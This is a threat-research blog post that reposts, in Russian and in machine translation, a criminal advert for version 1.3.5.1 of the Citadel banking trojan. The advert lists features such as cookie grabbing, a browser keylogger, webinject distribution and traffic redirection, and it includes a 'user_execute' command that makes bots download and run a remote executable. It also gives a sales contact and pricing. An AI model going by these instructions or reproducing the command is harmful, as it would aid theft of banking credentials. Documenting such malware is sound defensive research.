Quantcast
Channel: Malware don't need Coffee
Viewing all articles
Browse latest Browse all 185

Update to Citadel : 1.3.5.1 Rain Edition.

$
0
0

A new version of Citadel has been announced : 1.3.5.1 Rain Edition.
Aquabox post

Original text of the advert : (Pastebin)









Самые современные средства и инструменты для профессиональной работы собраны специально для вас в новой версии.
Решены проблемы с отстуком и живучестью, работа стала еще приятнее, учтены самые важные пожелания.
Взят во внимание весь опыт работы за последний сезон, новичкам будет гораздо проще работать с новой версией, чем с предыдущими.
Теперь открыта в свободном доступе новая технология WebInjects для всех желающих.

[+] Сделана быстрая проверка ботов на Online-статус, списком на главной странцие.
[+] Возможность добавить бота в "Избранное" без отчетов.
[+] Сделано детектирование привилегий в системе(admin/user), отображается в "Информация о боте: [Флаги]"
[+] Сортировка скриншотов по дате.
[+] Добавлена возможность подключения других БД Citadel (как удаленные БД, так и старые/отключенные админки) для поиска отчетов.
[+] Расширен поиск в БД: можно указывать стоп-слова, например twitter.com, которые будут отсутствовать при выдаче результатов, чтобы не засорять логи мусором. Также, можно указать поиск не по содержимому отчета, а по URL Mask, это увеличивает скорость поиска данных.
[+] Расширен Jabber уведомитель, добавлены следущие события:
- Маски BotID на событие "Бот вышел в Online"
- Уведомление при обнаружении конкретного ПО из "installed software"
- Маска на содержимое CMD отчета.
- Параллельная удобная запись в log-файл всех событий, помимо Jabber-уведомлений.
[+] Добавлен бесплатный модуль граббинга кукисов в Firefox, экспортирует все cookies из браузера и отсылает вам.
[+] Исправлена ошибка удаления отчетов.
[+] Авто-обновление статистики главной страницы.
[+] Кнопка [Decode] на отчетах, которая позволяет декодировать urlencode(%0D) последовательности в удобный вид.
[+] Добавлена возможность определения online/offline статуса у бота в API.
[+] Полностью переделан алгоритм проверки в модуле WebSocks.
[+] Отображение скриптов(команд) постранично.
[+] Добавлена возможность отсылки сообщений на jabber через api.php (использует ваши персональные настройки в админке)
[+] Теперь при каждом HTTP/HTTPS отчете, добавляются cookies(Firefox/IE), а также заголовки: 
[+] Полностью переделан внутренний алгоритм шифрования, отстук во много раз выше, живучесть дольше. Для переноса ботов на новую версию, выполняем команду user_execute http://www.host.com/1351.exe. RC4 ключ должен совпадать.
[+] Корректировка Browser Keylogger'a. Автоматически добавляются пробел, если с момента последнего нажатия клавиши прошло 5 секунд, необходимо для визуального разделения input-полей.
[+] Исправлен недочет с 302 редиректом, когда не срабатывал инжект, если осуществлялся переход по ссылке через javascript.
[+] Plaintext логи открываются в новой вкладке.
[+] Исправлена ошибка пропадания ботов из онлайна при включенном GeoIP.
[+] Отображение комментария к боту в VNC-модуле при наведении мышки, а также отсылка комментария в jabber вместе с информацией о коннекте.
[+] Возможность указать в DnsFilters(перенаправление траффика) маски со звездочками (*), можно сделать маску более гибкой.
[+] WebInjects. Модуль разработан для быстрого взаимодействия с холдером через технологию инжектов в браузеры. Модуль позволяет прогрузить любые инжекты конкретному BotID, стране или ботнету всего лишь за несколько минут, без редактирования конфига. Модуль работает через админку.
Краткий ликбез:
В конфиге бота, секция DynamicConfig, вписывается параметр url_webinjects "http://www.host.com/file.php" (путь до file.php). Бот дергает этот файл раз в 2 минуты, забирая оттуда пачку инжектов, которую выдает распределения система выдачи инжектов.
В разделе ВебИнжекты существуют 2 секции: "Группа вебинжектов" и "Паки", первая имеет структуру "Группа - Инжекты - Пользователи(допущенные к группе)" и отвечает за управление всеми инжектами. Вторая секция отвечает за настройку распространения инжектов(каким ботам доставляем инжекты и в каком количестве).
В главном меню, вразделе "Пользователи", при создании нового пользователя, есть права "r_botnet_webinjects_coder" это пользователь, который может управлять группой, привилегии которого назначит администратор. Иначе говоря, если вы допустите разработчика инжектов в админку и создадите ему аккаунт, то у него будут права создавать свои инжекты и редактировать их, чужие инжекты он не видит, отображается только своя группа списка инжектов. Т.е вы можете создать 5 групп и создать 5 инжект-кодеров, таким образом каждый человек отвечает за свою группу(набор инжектов). Вы смотрите в статистике что происходит в общей системе и можете объеденять все группы инжектов в один "пак", который будет прогружен всем без исключения ботам, либо отдельно взятой категории ботов по классу: страна или ботнет.
В админке создан специальный удобный визуальный редактор инжектов с подсветкой синтаксиса. Формат полностью совместим с зевсоформатом.
Сушествует несколько режимов для паков.
Dual - когда работает файл с инжектами из основного конфига + вебинжекты.
Single - когда работают только вебинжекты, а локальный файл с инжектами отключается.
Disabled - когда вебинжекты отключены, а локальный файл с инжектами работает.
Если случайно была допущена ошибка где-то в инжекте, то вебинжекты не соберутся и вам придет DEBUG-отчет с информацией, какой пак(bundle) не был собран.
В информации по боту, можно посмотреть историю прогрузки веб-инжектов, также, можно поискать DEBUG-отчеты по боту и посмотреть историю компиляций и ошибок вебинжектов.
Если бот получает сразу несколько паков(бандлов) где разные режимы работы: dual, single, disabled то из всех бандлов выбирается автоматически самый "узкий режим" работы, например single.
Бот постоянно сверяет наличие обновления любого из вебинжектов, и если таковое имеется, то он его обновляет у себя. 
[+] Опция в конфиге disable_httpgrabber расширена и позволяет полностью избавиться от HTTP-отчетов, отправляя на сервер только HTTPS-отчеты со всех браузеров, если установлено значение "1". Избавьтесь от лишней нагрузки на сервер.
[+] Добавлена секция "HttpVipUrls" в WebFilters, которая позволяет добавлять ссылки-исключения(http://) при отсутствии HTTP-граббинга (disable_httpgrabber 1). 
[+] Полностью перереботан мануал, теперь удобная навигация + раскрыты некоторые тонкости работы, а также добавлены ответы на популярные вопросы, с примерами. Изменено лицензионное соглашение, которое содержится в мануале.

Для получения новой версии, размещаем заявку в Jabber'e в таком формате: "<login в CRM> размещаю заявку на получение новой версии". Оплата поддержки должна быть своевременной, те, у кого задолжность более 3 месяцев - новую версию не получают. Срок выдачи от 3 до 72 часов. Если у вас имеется лицензированный партнер или саппорт, сразу пишите об этом в заявке до выдачи, а не после.

Для старых клиентов, обновление включено в абонентскую плату, для новых, цена базовой комплектации составляет теперь $3931.00

Jabber для покупки и обновлений: aquabox@lugmen.org.ar
Саппорт в праве отказать в продаже лицензии без объяснения причины. Поддержка клиентов на уровне сложных технических вопросов отменена из-за большого количества, обменивайтесь опытом с коллегами через CRM либо форумы.

----------------------------------
Google Translation : (Pastebin) - (if you want to correct this raw google translation, drop a comment or DM on Twitter )


The latest tools and tools for professional work collected for you in the new version.
Fixed problems with otstuk and vitality, work has become more pleasant, considered the most important requirements.
Taken into account the whole experience last season, beginners will be much easier to work with the new version than the previous ones.
Is now open for free access WebInjects new technology to the public.

[+] Did a quick check of bots on Online-status on the main list of page.
[+] Ability to add bot in the "Favorites" without reporting.
[+] Made detection system privileges (admin / user), is displayed in the "Information on bot [flags]"
[+] Sort by date screenshots.
[+] Added ability to connect to other databases Citadel (as remote database, and old / disabled admin) to search for reports.
[+] Expand your search in the database: you can specify the stop words, such as twitter.com, which will not appear in the issuance of the results, not to litter logging debris. Also, you can specify the contents of the search does not report, and for URL Mask, it increases the speed of data retrieval.
[+] Enhanced Jabber notifier added Next event:
- Masks BotID the event "Boat reached the Online"
- Be notified when a specific software from the "installed software"
- Mask to the contents of the report CMD.
- Parallel convenient entry in the log-file of all events, in addition to Jabber-notifications.
[+] Added a free module of grabbing cookies in Firefox, exports all the cookies from the browser and sends you.
[+] Fixed delete reports.
[+] Auto-Update Statistics homepage.
[+] Button [Decode] on the reports, which can decode urlencode (% 0D) sequences in a convenient form.
[+] Added the ability to determine the online / offline status of the bot in the API.
[+] Completely reworked the algorithm checks the module WebSocks.
[+] Show scripts (commands) by page.
[+] Added ability to send messages to a jabber api.php (uses your personal settings in the admin)
[+] Now, every HTTP / HTTPS report added cookies (Firefox / IE), as well as headlines:
[+] Completely redesigned internal encryption algorithm otstuk many times higher, longer survival. You need to migrate to the new version, run the command user_execute http://www.host.com/1351.exe. RC4 key must match.
[+] Adjust Browser Keylogger'a. Automatically adds a space if after the last key press was 5 seconds, you need to visually separate input-fields.
[+] Fixed an issue with a 302 redirect, did not work when inject, if you are following a link via javascript.
[+] Plaintext logs will open in a new tab.
[+] Fixed bots failure of the online when the GeoIP.
[+] Display the comment to the boat in the VNC-module by the mouse, as well as sending a comment to jabber with information about a connection.
[+] Ability to specify DnsFilters (redirect traffic) mask with an asterisk (*), you can make the mask more flexible.
[+] WebInjects. The module is designed for easy interaction with Holder through technology injected into browsers. The module allows any progruzit inject specific BotID, country or botnet in just a few minutes, without having to edit the config. The module works through the admin panel.
Brief educational program:
In config bot section DynamicConfig, fit parameter url_webinjects "http://www.host.com/file.php" (path to file.php). Boat pulls the file every 2 minutes, taking out a packet injector, which gives the distribution of the system of granting the injector.
From there VebInzhekty 2 sections: "The group vebinzhektov" and "Paki", the first is the structure of "group - injected - Members (admitted to the group)," and is responsible for managing all of the injector. The second section is responsible for setting the spread of the injector (which deliver bots inject and how much).
In the main menu, vrazdele "Users", creating a new user has rights "r_botnet_webinjects_coder" is a user who can manage the group, which will appoint an administrator privileges. In other words, if you make a developer injected in admin account and create it, it will have the right to form their own injector and edit them, others injected he sees only displays a list of his own group injected. Ie you can create 5 groups and create a 5-coders inject, so each person is responsible for their group (set injector). You see the statistics of what happens in the overall system and can unites all groups injected into one "pack", which will be progruzhen any and all bots, or a single category of boats in the class: a country or a botnet.
In the admin area, a special convenient visual editor injected with syntax highlighting. Format is fully compatible with zevsoformatom.
Image do several modes for packs.
Dual - when running a file with injected from the main config + vebinzhekty.
Single - when only vebinzhekty, and the local file with the injector is switched off.
Disabled - when vebinzhekty disabled, and local file with injector works.
If you accidentally make a mistake somewhere in the injector, the vebinzhekty be gathered together and you have to DEBUG-report with information which pack (bundle) was not assembled.
The information on the boat, you can see the history of injection test web injected, also, you can search DEBUG-bot reports and look at the history and compilation errors vebinzhektov.
If the bot receives several packs (bundles) where different modes of operation: dual, single, disabled then all Bandlov automatically selected the most "narrow mode", such as single.
Boat constantly checks for updates of any vebinzhektov, and if so, then it updates its host.
[+] Option in the config disable_httpgrabber expanded and allows to get rid of HTTP-reports sent to the server HTTPS-only reports on all browsers, if set to "1". Get rid of the extra load on the server.
[+] Added the section "HttpVipUrls" in WebFilters, which allows you to add links-exclusion (http://) in the absence of HTTP-grabbing (disable_httpgrabber 1).
[+] Fully pererebotan manual now easy navigation + revealed some details of the work, and also added the answers to frequently asked questions, with examples. Changed the license agreement, which is contained in the manual.

To get the new version, place a request in Jabber'e in this format: "<login CRM> in place an application for a new version." Payment of support must be timely, those with debts of more than 3 months - do not get the new version. Term delivery from 3 to 72 hours. If you have a licensed partner or a support, just write it in the application to the issue, and not after.

For existing customers, the update is included in the monthly fee for the new price of the basic configuration is now $ 3931.00

Jabber for purchases and upgrades: aquabox@lugmen.org.ar
A support of the right to refuse the sale of a license without giving a reason. Customer support at the level of the complex technical issues canceled due to the number, share experience with colleagues through CRM or forums.


----------------------------------
Want to read more ?
Inside Citadel 1.3.4.5 C&C & Builder - Botnet Control Panel - 2012-07-29
Update to Citadel : v.1.3.4.5 - 2012-06-11
Update to Citadel : v1.3.3.5 - 2012-04-03

Viewing all articles
Browse latest Browse all 185

Trending Articles